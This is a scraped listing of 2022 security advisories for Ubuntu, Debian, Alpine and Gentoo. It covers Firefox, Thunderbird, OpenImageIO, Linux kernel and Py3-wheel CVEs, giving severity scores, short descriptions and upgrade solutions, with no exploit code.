ISHACK AI BOT

Ubuntu: (Multiple Advisories) (CVE-2022-34470): Firefox vulnerabilities Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 12/22/2022 Created 03/29/2023 Added 03/22/2023 Modified 01/28/2025 Description Session history navigations may have led to a use-after-free and potentially exploitable crash. This vulnerability affects Firefox < 102, Firefox ESR < 91.11, Thunderbird < 102, and Thunderbird < 91.11. Solution(s) ubuntu-upgrade-firefox ubuntu-upgrade-thunderbird References https://attackerkb.com/topics/cve-2022-34470 CVE - 2022-34470 USN-5504-1 USN-5512-1

Ubuntu: (CVE-2022-36314): thunderbird vulnerability Severity 5 CVSS (AV:L/AC:M/Au:N/C:N/I:C/A:N) Published 12/22/2022 Created 11/21/2024 Added 11/19/2024 Modified 01/28/2025 Description When opening a Windows shortcut from the local filesystem, an attacker could supply a remote path that would lead to unexpected network requests from the operating system.<br>This bug only affects Firefox for Windows. Other operating systems are unaffected.*. This vulnerability affects Firefox ESR < 102.1, Firefox < 103, and Thunderbird < 102.1. Solution(s) ubuntu-upgrade-thunderbird References https://attackerkb.com/topics/cve-2022-36314 CVE - 2022-36314 https://www.cve.org/CVERecord?id=CVE-2022-36314 https://www.mozilla.org/en-US/security/advisories/mfsa2022-30/#CVE-2022-36314

Debian: CVE-2022-43601: openimageio -- security update Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/22/2022 Created 05/05/2023 Added 04/06/2023 Modified 01/28/2025 Description Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `ymax` variable is set to 0xFFFF and `m_spec.format` is `TypeDesc::UINT16` Solution(s) debian-upgrade-openimageio References https://attackerkb.com/topics/cve-2022-43601 CVE - 2022-43601 DLA-3382-1

Ubuntu: (Multiple Advisories) (CVE-2022-34468): Firefox vulnerabilities Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/22/2022 Created 03/29/2023 Added 03/22/2023 Modified 01/28/2025 Description An iframe that was not permitted to run scripts could do so if the user clicked on a <code>javascript:</code> link. This vulnerability affects Firefox < 102, Firefox ESR < 91.11, Thunderbird < 102, and Thunderbird < 91.11. Solution(s) ubuntu-upgrade-firefox ubuntu-upgrade-thunderbird References https://attackerkb.com/topics/cve-2022-34468 CVE - 2022-34468 USN-5504-1 USN-5512-1

Debian: CVE-2022-4378: linux -- security update Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 12/22/2022 Created 12/23/2022 Added 12/22/2022 Modified 01/30/2025 Description A stack overflow flaw was found in the Linux kernel's SYSCTL subsystem in how a user changes certain kernel parameters and variables. This flaw allows a local user to crash or potentially escalate their privileges on the system. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2022-4378 CVE - 2022-4378 DLA-3244-1 DLA-3245-1

Debian: CVE-2022-4662: linux -- security update Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 12/22/2022 Created 07/31/2024 Added 07/30/2024 Modified 01/28/2025 Description A flaw incorrect access control in the Linux kernel USB core subsystem was found in the way user attaches usb device. A local user could use this flaw to crash the system. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2022-4662 CVE - 2022-4662

Debian: CVE-2022-43593: openimageio -- security update Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:N/A:C) Published 12/22/2022 Created 05/05/2023 Added 04/06/2023 Modified 01/28/2025 Description A denial of service vulnerability exists in the DPXOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to null pointer dereference. An attacker can provide malicious input to trigger this vulnerability. Solution(s) debian-upgrade-openimageio References https://attackerkb.com/topics/cve-2022-43593 CVE - 2022-43593 DLA-3382-1

Alpine Linux: CVE-2022-34480: Access of Uninitialized Pointer Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/22/2022 Created 08/23/2024 Added 08/22/2024 Modified 10/02/2024 Description Within the <code>lg_init()</code> function, if several allocations succeed but then one fails, an uninitialized pointer would have been freed despite never being allocated. This vulnerability affects Firefox < 102. Solution(s) alpine-linux-upgrade-firefox References https://attackerkb.com/topics/cve-2022-34480 CVE - 2022-34480 https://security.alpinelinux.org/vuln/CVE-2022-34480

Debian: CVE-2022-43598: openimageio -- security update Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/22/2022 Created 05/05/2023 Added 04/06/2023 Modified 01/28/2025 Description Multiple memory corruption vulnerabilities exist in the IFFOutput alignment padding functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to arbitrary code execution. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `m_spec.format` is `TypeDesc::UINT16`. Solution(s) debian-upgrade-openimageio References https://attackerkb.com/topics/cve-2022-43598 CVE - 2022-43598 DLA-3382-1

Debian: CVE-2022-43603: openimageio -- security update Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:N/A:C) Published 12/22/2022 Created 05/05/2023 Added 04/06/2023 Modified 01/28/2025 Description A denial of service vulnerability exists in the ZfileOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to denial of service. An attacker can provide a malicious file to trigger this vulnerability. Solution(s) debian-upgrade-openimageio References https://attackerkb.com/topics/cve-2022-43603 CVE - 2022-43603 DLA-3382-1

Debian: CVE-2022-43602: openimageio -- security update Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/22/2022 Created 05/05/2023 Added 04/06/2023 Modified 01/28/2025 Description Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `ymax` variable is set to 0xFFFF and `m_spec.format` is `TypeDesc::UINT8` Solution(s) debian-upgrade-openimageio References https://attackerkb.com/topics/cve-2022-43602 CVE - 2022-43602 DLA-3382-1

Alpine Linux: CVE-2022-40898: Vulnerability in Py3-wheel Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 12/22/2022 Created 03/22/2024 Added 03/21/2024 Modified 03/22/2024 Description An issue discovered in Python Packaging Authority (PyPA) Wheel 0.37.1 and earlier allows remote attackers to cause a denial of service via attacker controlled input to wheel cli. Solution(s) alpine-linux-upgrade-py3-wheel References https://attackerkb.com/topics/cve-2022-40898 CVE - 2022-40898 https://security.alpinelinux.org/vuln/CVE-2022-40898

Debian: CVE-2022-46877: firefox-esr, thunderbird -- security update Severity 4 CVSS (AV:N/AC:M/Au:N/C:N/I:P/A:N) Published 12/22/2022 Created 01/20/2023 Added 01/20/2023 Modified 01/28/2025 Description By confusing the browser, the fullscreen notification could have been delayed or suppressed, resulting in potential user confusion or spoofing attacks. This vulnerability affects Firefox < 108. Solution(s) debian-upgrade-firefox-esr debian-upgrade-thunderbird References https://attackerkb.com/topics/cve-2022-46877 CVE - 2022-46877 DLA-3275-1 DSA-5322 DSA-5322-1 DSA-5355

Debian: CVE-2022-46871: firefox-esr, libusrsctp, thunderbird -- security update Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/22/2022 Created 01/20/2023 Added 01/20/2023 Modified 01/28/2025 Description An out of date library (libusrsctp) contained vulnerabilities that could potentially be exploited. This vulnerability affects Firefox < 108. Solution(s) debian-upgrade-firefox-esr debian-upgrade-libusrsctp debian-upgrade-thunderbird References https://attackerkb.com/topics/cve-2022-46871 CVE - 2022-46871 DLA-3275-1 DSA-5322 DSA-5322-1 DSA-5355

Debian: CVE-2022-43600: openimageio -- security update Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/22/2022 Created 05/05/2023 Added 04/06/2023 Modified 01/28/2025 Description Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `xmax` variable is set to 0xFFFF and `m_spec.format` is `TypeDesc::UINT16` Solution(s) debian-upgrade-openimageio References https://attackerkb.com/topics/cve-2022-43600 CVE - 2022-43600 DLA-3382-1

Debian: CVE-2022-43597: openimageio -- security update Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/22/2022 Created 05/05/2023 Added 04/06/2023 Modified 01/28/2025 Description Multiple memory corruption vulnerabilities exist in the IFFOutput alignment padding functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to arbitrary code execution. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `m_spec.format` is `TypeDesc::UINT8`. Solution(s) debian-upgrade-openimageio References https://attackerkb.com/topics/cve-2022-43597 CVE - 2022-43597 DLA-3382-1

Debian: CVE-2022-43594: openimageio -- security update Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:N/A:C) Published 12/22/2022 Created 05/05/2023 Added 04/06/2023 Modified 01/28/2025 Description Multiple denial of service vulnerabilities exist in the image output closing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. Specially crafted ImageOutput Objects can lead to multiple null pointer dereferences. An attacker can provide malicious multiple inputs to trigger these vulnerabilities.This vulnerability applies to writing .bmp files. Solution(s) debian-upgrade-openimageio References https://attackerkb.com/topics/cve-2022-43594 CVE - 2022-43594 DLA-3382-1

Debian: CVE-2022-43592: openimageio -- security update Severity 7 CVSS (AV:N/AC:M/Au:N/C:C/I:N/A:N) Published 12/22/2022 Created 05/05/2023 Added 04/06/2023 Modified 01/28/2025 Description An information disclosure vulnerability exists in the DPXOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to leaked heap data. An attacker can provide malicious input to trigger this vulnerability. Solution(s) debian-upgrade-openimageio References https://attackerkb.com/topics/cve-2022-43592 CVE - 2022-43592 DLA-3382-1

Debian: CVE-2022-3033: thunderbird -- security update Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:N) Published 12/22/2022 Created 07/31/2024 Added 07/30/2024 Modified 01/30/2025 Description If a Thunderbird user replied to a crafted HTML email containing a <code>meta</code> tag, with the <code>meta</code> tag having the <code>http-equiv="refresh"</code> attribute, and the content attribute specifying an URL, then Thunderbird started a network request to that URL, regardless of the configuration to block remote content. In combination with certain other HTML elements and attributes in the email, it was possible to execute JavaScript code included in the message in the context of the message compose document. The JavaScript code was able to perform actions including, but probably not limited to, read and modify the contents of the message compose document, including the quoted original message, which could potentially contain the decrypted plaintext of encrypted data in the crafted email. The contents could then be transmitted to the network, either to the URL specified in the META refresh tag, or to a different URL, as the JavaScript code could modify the URL specified in the document. This bug doesn't affect users who have changed the default Message Body display setting to 'simple html' or 'plain text'. This vulnerability affects Thunderbird < 102.2.1 and Thunderbird < 91.13.1. Solution(s) debian-upgrade-thunderbird References https://attackerkb.com/topics/cve-2022-3033 CVE - 2022-3033

Debian: CVE-2022-41639: openimageio -- security update Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 12/22/2022 Created 05/05/2023 Added 04/06/2023 Modified 01/28/2025 Description A heap based buffer overflow vulnerability exists in tile decoding code of TIFF image parser in OpenImageIO master-branch-9aeece7a and v2.3.19.0. A specially-crafted TIFF file can lead to an out of bounds memory corruption, which can result in arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. Solution(s) debian-upgrade-openimageio References https://attackerkb.com/topics/cve-2022-41639 CVE - 2022-41639 DLA-3382-1

Debian: CVE-2022-43595: openimageio -- security update Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:N/A:C) Published 12/22/2022 Created 05/05/2023 Added 04/06/2023 Modified 01/28/2025 Description Multiple denial of service vulnerabilities exist in the image output closing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. Specially crafted ImageOutput Objects can lead to multiple null pointer dereferences. An attacker can provide malicious multiple inputs to trigger these vulnerabilities.This vulnerability applies to writing .fits files. Solution(s) debian-upgrade-openimageio References https://attackerkb.com/topics/cve-2022-43595 CVE - 2022-43595 DLA-3382-1

Alpine Linux: CVE-2022-22745: Vulnerability in Multiple Components Severity 7 CVSS (AV:N/AC:M/Au:N/C:C/I:N/A:N) Published 12/22/2022 Created 08/23/2024 Added 08/22/2024 Modified 10/02/2024 Description Securitypolicyviolation events could have leaked cross-origin information for frame-ancestors violations. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5. Solution(s) alpine-linux-upgrade-firefox-esr alpine-linux-upgrade-firefox alpine-linux-upgrade-thunderbird References https://attackerkb.com/topics/cve-2022-22745 CVE - 2022-22745 https://security.alpinelinux.org/vuln/CVE-2022-22745

Debian: CVE-2022-43596: openimageio -- security update Severity 7 CVSS (AV:N/AC:M/Au:N/C:C/I:N/A:N) Published 12/22/2022 Created 05/05/2023 Added 04/06/2023 Modified 01/28/2025 Description An information disclosure vulnerability exists in the IFFOutput channel interleaving functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to leaked heap data. An attacker can provide malicious input to trigger this vulnerability. Solution(s) debian-upgrade-openimageio References https://attackerkb.com/topics/cve-2022-43596 CVE - 2022-43596 DLA-3382-1

Alpine Linux: CVE-2022-36318: Race Condition Severity 5 CVSS (AV:N/AC:H/Au:N/C:C/I:N/A:N) Published 12/22/2022 Created 08/23/2024 Added 08/22/2024 Modified 10/02/2024 Description When visiting directory listings for `chrome://` URLs as source text, some parameters were reflected. This vulnerability affects Firefox ESR < 102.1, Firefox ESR < 91.12, Firefox < 103, Thunderbird < 102.1, and Thunderbird < 91.12. Solution(s) alpine-linux-upgrade-firefox-esr alpine-linux-upgrade-firefox References https://attackerkb.com/topics/cve-2022-36318 CVE - 2022-36318 https://security.alpinelinux.org/vuln/CVE-2022-36318

Gentoo Linux: CVE-2022-46880: Mozilla Firefox: Multiple Vulnerabilities Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:N/A:C) Published 12/22/2022 Created 05/05/2023 Added 05/04/2023 Modified 01/28/2025 Description A missing check related to tex units could have led to a use-after-free and potentially exploitable crash.<br />*Note*: This advisory was added on December 13th, 2022 after we better understood the impact of the issue. The fix was included in the original release of Firefox 105. This vulnerability affects Firefox ESR < 102.6, Firefox < 105, and Thunderbird < 102.6. Solution(s) gentoo-linux-upgrade-mail-client-thunderbird gentoo-linux-upgrade-mail-client-thunderbird-bin gentoo-linux-upgrade-www-client-firefox gentoo-linux-upgrade-www-client-firefox-bin References https://attackerkb.com/topics/cve-2022-46880 CVE - 2022-46880 202305-06 202305-13